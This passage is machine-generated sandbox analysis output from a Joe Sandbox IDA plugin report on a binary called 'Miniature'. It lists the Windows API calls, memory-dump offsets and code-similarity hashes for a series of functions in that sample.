                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                  • String ID:
                                                  • API String ID: 521402451-0
                                                  • Opcode ID: b6e1314bfc74159f7f3788f8baf4259459cad8d8db0d39b8b779968ebe0f338e
                                                  • Instruction ID: 2081f7232d1fca0fcd2eaef868a7ec68245afad13110fe364b6259af97b107ec
                                                  • Opcode Fuzzy Hash: b6e1314bfc74159f7f3788f8baf4259459cad8d8db0d39b8b779968ebe0f338e
                                                  • Instruction Fuzzy Hash: EC113D729042086EDB14B7A69C43DFE7B5DDF41320F200116F20457283DF696C42BBA1
                                                  APIs
                                                    • Part of subcall function 00FE8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FE8D3F
                                                    • Part of subcall function 00FE8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8D49
                                                    • Part of subcall function 00FE8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8D58
                                                    • Part of subcall function 00FE8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8D5F
                                                    • Part of subcall function 00FE8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8D75
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00FE92C1
                                                  • _memcmp.LIBCMT ref: 00FE92E4
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FE931A
                                                  • HeapFree.KERNEL32(00000000), ref: 00FE9321
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                  • String ID:
                                                  • API String ID: 1592001646-0
                                                  • Opcode ID: 4b4c955c59252f8aefffac872dbde40a9fd48e2b28265b0507d771e068ec694b
                                                  • Instruction ID: 224a7895e85b0bdb3e9d4c35cff08b2eca5c974c8a3aa82f54c2b82cd31fd76d
                                                  • Opcode Fuzzy Hash: 4b4c955c59252f8aefffac872dbde40a9fd48e2b28265b0507d771e068ec694b
                                                  • Instruction Fuzzy Hash: E621AF31E44208EFDB20DFA6C945BEEF7B8FF44311F144059E894A7290D7B5AA05EBA0
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 010163BD
                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 010163D7
                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 010163E5
                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 010163F3
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Window$Long$AttributesLayered
                                                  • String ID:
                                                  • API String ID: 2169480361-0
                                                  • Opcode ID: 089eedb5f693d043ead3ee3214c863cba0bed8278eca47cbfc3f80927750023d
                                                  • Instruction ID: c42f019e42763cc765c2fabed3af41d65defd53ca128fa259b23efe53f487944
                                                  • Opcode Fuzzy Hash: 089eedb5f693d043ead3ee3214c863cba0bed8278eca47cbfc3f80927750023d
                                                  • Instruction Fuzzy Hash: 7411E631305514AFEB15AF28CC44FBE7B99EF45320F148119F956C72D1CBAAAD01CB95
                                                  APIs
                                                    • Part of subcall function 00FEF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00FEE46F,?,?,?,00FEF262,00000000,000000EF,00000119,?,?), ref: 00FEF867
                                                    • Part of subcall function 00FEF858: lstrcpyW.KERNEL32(00000000,?,?,00FEE46F,?,?,?,00FEF262,00000000,000000EF,00000119,?,?,00000000), ref: 00FEF88D
                                                    • Part of subcall function 00FEF858: lstrcmpiW.KERNEL32(00000000,?,00FEE46F,?,?,?,00FEF262,00000000,000000EF,00000119,?,?), ref: 00FEF8BE
                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00FEF262,00000000,000000EF,00000119,?,?,00000000), ref: 00FEE488
                                                  • lstrcpyW.KERNEL32(00000000,?,?,00FEF262,00000000,000000EF,00000119,?,?,00000000), ref: 00FEE4AE
                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00FEF262,00000000,000000EF,00000119,?,?,00000000), ref: 00FEE4E2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: lstrcmpilstrcpylstrlen
                                                  • String ID: cdecl
                                                  • API String ID: 4031866154-3896280584
                                                  • Opcode ID: 03c097064f0cbc54a1883e923a1ac167f3d5646dc34b4d425745b443a7a1045d
                                                  • Instruction ID: 94351c4d7dcfb6c4d535d4cedf428c16082565c225e20d220f08018d0c2083f7
                                                  • Opcode Fuzzy Hash: 03c097064f0cbc54a1883e923a1ac167f3d5646dc34b4d425745b443a7a1045d
                                                  • Instruction Fuzzy Hash: 3411223A200384AFCB20AF35EC45D7A77A9FF45360B50402AF846CB290EB359940EB90
                                                  APIs
                                                  • _free.LIBCMT ref: 00FC5331
                                                    • Part of subcall function 00FB593C: __FF_MSGBANNER.LIBCMT ref: 00FB5953
                                                    • Part of subcall function 00FB593C: __NMSG_WRITE.LIBCMT ref: 00FB595A
                                                    • Part of subcall function 00FB593C: RtlAllocateHeap.NTDLL(011A0000,00000000,00000001,?,00000004,?,?,00FB1003,?), ref: 00FB597F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap_free
                                                  • String ID:
                                                  • API String ID: 614378929-0
                                                  • Opcode ID: 0df0cad3cd16812d45a02b3e8da3168d517bdb9f49c9c17e0a52b73a379204a7
                                                  • Instruction ID: db1461a2df82de3112467370a5b01461b32855987119ab77ca2181ae7374588f
                                                  • Opcode Fuzzy Hash: 0df0cad3cd16812d45a02b3e8da3168d517bdb9f49c9c17e0a52b73a379204a7
                                                  • Instruction Fuzzy Hash: 1E113832900A07AFCB302F70AD06B9A36999F54BF0B10451EF8489A090CE799881FB80
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00FF4385
                                                  • _memset.LIBCMT ref: 00FF43A6
                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00FF43F8
                                                  • CloseHandle.KERNEL32(00000000), ref: 00FF4401
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                  • String ID:
                                                  • API String ID: 1157408455-0
                                                  • Opcode ID: 519510251444c0fa0b9e87049e7e5b17e8bea000614513fd059fa3775346bee5
                                                  • Instruction ID: 9bf732267e13bf300e2368cab9b9aa13258a6d5ce08d91c93e99b064f2e3bcdd
                                                  • Opcode Fuzzy Hash: 519510251444c0fa0b9e87049e7e5b17e8bea000614513fd059fa3775346bee5
                                                  • Instruction Fuzzy Hash: 3011E771D0132C7AE7309AA5AC4DFEBBB7CEF45760F10459AF908E7190D2744E809BA4
                                                  APIs
                                                    • Part of subcall function 00FA402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FF7E51,?,?,00000000), ref: 00FA4041
                                                    • Part of subcall function 00FA402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FF7E51,?,?,00000000,?,?), ref: 00FA4065
                                                  • gethostbyname.WSOCK32(?,?,?), ref: 01006A84
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 01006A8F
                                                  • _memmove.LIBCMT ref: 01006ABC
                                                  • inet_ntoa.WSOCK32(?), ref: 01006AC7
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                  • String ID:
                                                  • API String ID: 1504782959-0
                                                  • Opcode ID: 94aad4ab80d2e12044e5e41d3b1d7eec8fa00e5e25a03957cd7a72978fde980b
                                                  • Instruction ID: dff056b3e6ef88bed3864e047027fd56b167129bdcd26c5c1aa1c605ffe021a3
                                                  • Opcode Fuzzy Hash: 94aad4ab80d2e12044e5e41d3b1d7eec8fa00e5e25a03957cd7a72978fde980b
                                                  • Instruction Fuzzy Hash: 7111BE72900109AFCB10FFA4CD46CEEB7B8BF19310B108065F542A72A1DF75AE10EBA1
                                                  APIs
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00FE9719
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FE972B
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FE9741
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FE975C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 269075c7199f4f0132d4f666fbe35c7587ed2fc51a570b5613c02fd38bf8a4dd
                                                  • Instruction ID: ccb0fd0e64d57854b1a7b1ae6902ef6fa7157404c6a7428590078fa4e8c9b2c8
                                                  • Opcode Fuzzy Hash: 269075c7199f4f0132d4f666fbe35c7587ed2fc51a570b5613c02fd38bf8a4dd
                                                  • Instruction Fuzzy Hash: A811483A901218FFEB10DF95C984E9DBBB8FB48710F204091E900B7294D6716E14EBA0
                                                  APIs
                                                    • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                  • DefDlgProcW.USER32(?,00000020,?), ref: 00F916B4
                                                  • GetClientRect.USER32(?,?), ref: 00FCB93C
                                                  • GetCursorPos.USER32(?), ref: 00FCB946
                                                  • ScreenToClient.USER32(?,?), ref: 00FCB951
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                  • String ID:
                                                  • API String ID: 4127811313-0
                                                  • Opcode ID: 90427324f792690c7b4833556d30e9cd2593b38672a2d23ac71ad9b171e4edac
                                                  • Instruction ID: 74baea43e4431419af5f99f948245f74b1f1d5cb6e2dd05e4484d21ec44ae862
                                                  • Opcode Fuzzy Hash: 90427324f792690c7b4833556d30e9cd2593b38672a2d23ac71ad9b171e4edac
                                                  • Instruction Fuzzy Hash: 8C112835A0011AABDF20EF54D885DFE77B8FB04300F540465FA91E7144C735BA51EBA1
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F9214F
                                                  • GetStockObject.GDI32(00000011), ref: 00F92163
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F9216D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CreateMessageObjectSendStockWindow
                                                  • String ID:
                                                  • API String ID: 3970641297-0
                                                  • Opcode ID: 7aa412be6f23aea009897b5bc44e2a56e6274bea5d707637117474eae63f506d
                                                  • Instruction ID: 684817828c852da64cbec713a271ac78a05e71eceb077190c9343384e00950a8
                                                  • Opcode Fuzzy Hash: 7aa412be6f23aea009897b5bc44e2a56e6274bea5d707637117474eae63f506d
                                                  • Instruction Fuzzy Hash: 47115B72901649BFEF624E909C45EEBBB6DFF58764F150116FA0452118C7369CA0EBA0
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FF04EC,?,00FF153F,?,00008000), ref: 00FF195E
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00FF04EC,?,00FF153F,?,00008000), ref: 00FF1983
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FF04EC,?,00FF153F,?,00008000), ref: 00FF198D
                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,00FF04EC,?,00FF153F,?,00008000), ref: 00FF19C0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CounterPerformanceQuerySleep
                                                  • String ID:
                                                  • API String ID: 2875609808-0
                                                  • Opcode ID: 723524c4afd4019859d5940bf6aca17f3141512e3dcb43f2b1dfd466b186c224
                                                  • Instruction ID: 6996a66d761aeacbd36649b1390aa536d2135c9424921947c1549370ddadcb78
                                                  • Opcode Fuzzy Hash: 723524c4afd4019859d5940bf6aca17f3141512e3dcb43f2b1dfd466b186c224
                                                  • Instruction Fuzzy Hash: 70114831C0061DDBDF209FA5D999AEEBB78BF08751F104045EA80B2258CB7596609BD1
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0101E1EA
                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0101E201
                                                  • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0101E216
                                                  • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0101E234
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Type$Register$FileLoadModuleNameUser
                                                  • String ID:
                                                  • API String ID: 1352324309-0
                                                  • Opcode ID: ca45e39d6870ffb7937cf6c1efd3f34bdd32d794edc124c701a244623a368164
                                                  • Instruction ID: 4b819e56b3701c97d4db57ff6f52e55b9558f414fd175a4a6d3d251c1492bd20
                                                  • Opcode Fuzzy Hash: ca45e39d6870ffb7937cf6c1efd3f34bdd32d794edc124c701a244623a368164
                                                  • Instruction Fuzzy Hash: 2F113CB52053059FE3318F51DD08BDBBBBCEB04B00F108559EA9696048D7B9E5089BA1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                  • String ID:
                                                  • API String ID: 3016257755-0
                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction ID: 1eda606e9b13eda0e5e1571c774ea07fd6f8db11a037b0980631c4897bc2c239
                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction Fuzzy Hash: 27017B3244824EBBCF126E85CE02EEE3F26BB59350B188519FA1858131C236C9B1BF81
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 0101B956
                                                  • ScreenToClient.USER32(?,?), ref: 0101B96E
                                                  • ScreenToClient.USER32(?,?), ref: 0101B992
                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0101B9AD
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                  • String ID:
                                                  • API String ID: 357397906-0
                                                  • Opcode ID: 7460960dc5f0286ff395ebb38bc3ae42b6a7bc994de1bd31c1f4a5c033b1de3b
                                                  • Instruction ID: 0424455caba2f33920e8d4620dd2447bdda727bad77aed863c1d2f4c9cff5538
                                                  • Opcode Fuzzy Hash: 7460960dc5f0286ff395ebb38bc3ae42b6a7bc994de1bd31c1f4a5c033b1de3b
                                                  • Instruction Fuzzy Hash: 031172B9D00209EFDB51CFA8D584AEEFBF9FF48210F108166E954E3614D735AA618F90
                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(?), ref: 00FF71A1
                                                    • Part of subcall function 00FF7C7F: _memset.LIBCMT ref: 00FF7CB4
                                                  • _memmove.LIBCMT ref: 00FF71C4
                                                  • _memset.LIBCMT ref: 00FF71D1
                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00FF71E1
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                  • String ID:
                                                  • API String ID: 48991266-0
                                                  • Opcode ID: 1c86ecd183ad8cd4c9eb892de174e3dd6194df27ac1d02c230de379414e372ad
                                                  • Instruction ID: db6f43e8b3dd3c5ec0fdcf95df83620c057646dbc87f89173ec42cf86b605e39
                                                  • Opcode Fuzzy Hash: 1c86ecd183ad8cd4c9eb892de174e3dd6194df27ac1d02c230de379414e372ad
                                                  • Instruction Fuzzy Hash: 3AF05436200104ABCF117F55DC85A9ABB29EF45360F04C051FE085E21AC736A915EBB4
                                                  APIs
                                                    • Part of subcall function 00F916CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F91729
                                                    • Part of subcall function 00F916CF: SelectObject.GDI32(?,00000000), ref: 00F91738
                                                    • Part of subcall function 00F916CF: BeginPath.GDI32(?), ref: 00F9174F
                                                    • Part of subcall function 00F916CF: SelectObject.GDI32(?,00000000), ref: 00F91778
                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0101C3E8
                                                  • LineTo.GDI32(00000000,?,?), ref: 0101C3F5
                                                  • EndPath.GDI32(00000000), ref: 0101C405
                                                  • StrokePath.GDI32(00000000), ref: 0101C413
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                  • String ID:
                                                  • API String ID: 1539411459-0
                                                  • Opcode ID: 64f7d0fbec30b0f890c6629e884d9bb626e0abea0ab2ab1ffbe4f7f3e95af2c2
                                                  • Instruction ID: ce2664733d59225f09323eddb5d143efb1de22016a1b2137c726b717ddd6440c
                                                  • Opcode Fuzzy Hash: 64f7d0fbec30b0f890c6629e884d9bb626e0abea0ab2ab1ffbe4f7f3e95af2c2
                                                  • Instruction Fuzzy Hash: C4F0BE31085319BBFB322F54AC0AFDE3F99AF05310F288040FA91210D9877E6190EBA9
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00FEAA6F
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FEAA82
                                                  • GetCurrentThreadId.KERNEL32 ref: 00FEAA89
                                                  • AttachThreadInput.USER32(00000000), ref: 00FEAA90
                                                  Memory Dump Source
